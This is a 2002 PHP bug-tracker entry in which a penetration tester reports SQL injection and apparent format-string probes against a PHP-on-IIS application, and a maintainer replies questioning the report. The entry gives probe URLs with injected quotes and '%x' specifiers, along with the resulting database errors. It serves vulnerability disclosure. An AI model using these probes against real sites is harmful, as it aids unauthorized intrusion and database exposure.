ID: 20124 Updated by: [EMAIL PROTECTED] Reported By: [EMAIL PROTECTED] -Status: Open +Status: Feedback Bug Type: IIS related Operating System: Win2k PHP Version: 4.2.3 New Comment:
What exactly you think the bug is here? And have you read this ever: http://www.php.net/manual/en/security.cgi-bin.php Previous Comments: ------------------------------------------------------------------------ [2002-10-27 13:04:42] [EMAIL PROTECTED] During a Pentest, I was searching for sql injection, and noticed that PHP returned the following error http://www.victim.com/cgi-bin/ecust.cfg/php.exe/enduser/std_adp.php?p_admin=1&p_faqid=510' Internal Error -------------------------------------------------------------------------------- File: odbc2.c Line: 211 In Fcn.: sql_prepare Called Fcn.: SQLPrepare() returned -1 Description: 42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ')'. 42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Line 7: Incorrect syntax near ')'. 42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Statement(s) could not be prepared. SQL STMT: select f.faq_id, f.faq_group_id, f.lang_id, f.title, f.description, f.solution, f.created, f.updated, l1.label, l2.label from faqs f left outer join labels l1 on (f.access_id = l1.label_id) and (11 = l1.tbl) and (f.lang_id = l1.lang_id) left outer join labels l2 on (f.status = l2.label_id) and (19 = l2.tbl) and (f.lang_id = l2.lang_id) ,statuses s where (f.status = s.code) and (s.type_id = 4) and (f.access_id in (1, 2)) and (f.faq_id = 510') Indicating SQL injection. By entering http://www.victim.com/cgi-bin/ecust.cfg/php.exe/enduser/std_adp.php?p_admin=1&p_faqid=510'A You will notice in that the returned error message shows the 'A Internal Error -------------------------------------------------------------------------------- File: odbc2.c Line: 211 In Fcn.: sql_prepare Called Fcn.: SQLPrepare() returned -1 Description: 42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string 'A)'. 42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Line 7: Incorrect syntax near 'A)'. 42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Statement(s) could not be prepared. SQL STMT: select f.faq_id, f.faq_group_id, f.lang_id, f.title, f.description, f.solution, f.created, f.updated, l1.label, l2.label from faqs f left outer join labels l1 on (f.access_id = l1.label_id) and (11 = l1.tbl) and (f.lang_id = l1.lang_id) left outer join labels l2 on (f.status = l2.label_id) and (19 = l2.tbl) and (f.lang_id = l2.lang_id) ,statuses s where (f.status = s.code) and (s.type_id = 4) and (f.access_id in (1, 2)) and (f.faq_id = 510'A) To test for the poosibility of a Format String I entered the following http://victim.com/cgi-bin/ecust.cfg/php.exe/enduser/std_adp.php?p_admin=1&p_faqid=510'%x%x%x%x You will note from the Error logs that a format string bug is present in Four different fields Internal Error -------------------------------------------------------------------------------- File: odbc2.c Line: 211 In Fcn.: sql_prepare Called Fcn.: SQLPrepare() returned -1 Description: 42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '51275075127680)'. 42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Line 7: Incorrect syntax near '10081b6e0ffffffffdf1eb0)'. 42000: [Microsoft][ODBC SQL Server Driver][SQL Server]Statement(s) could not be prepared. SQL STMT: select f.faq_id, f.faq_group_id, f.lang_id, f.title, f.description, f.solution, f.created, f.updated, l1.label, l2.label from faqs f left outer join labels l1 on (f.access_id = l1.label_id) and (11 = l1.tbl) and (f.lang_id = l1.lang_id) left outer join labels l2 on (f.status = l2.label_id) and (19 = l2.tbl) and (f.lang_id = l2.lang_id) ,statuses s where (f.status = s.code) and (s.type_id = 4) and (f.access_id in (1, 2)) and (f.faq_id = 510'12fbe8cf7124b4a018b46030) This format string bug is NOT dependent on there being SQL injection present. To get the format string you just have to cause an error example http://www.victim.com/cgi-bin/ecust.cfg/php.exe/enduser/std_adp.php?p_admin=1&p_faqid=510> This obviously indicates that the Format String is in the Error Handling process. Regards Mark Litchfield www.ngssoftware.com Tel +44 1241 431367 email: [EMAIL PROTECTED] ------------------------------------------------------------------------ -- Edit this bug report at http://bugs.php.net/?id=20124&edit=1
